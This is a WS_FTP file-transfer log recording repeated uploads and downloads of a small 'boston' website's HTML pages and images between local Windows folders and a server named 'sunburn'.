10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
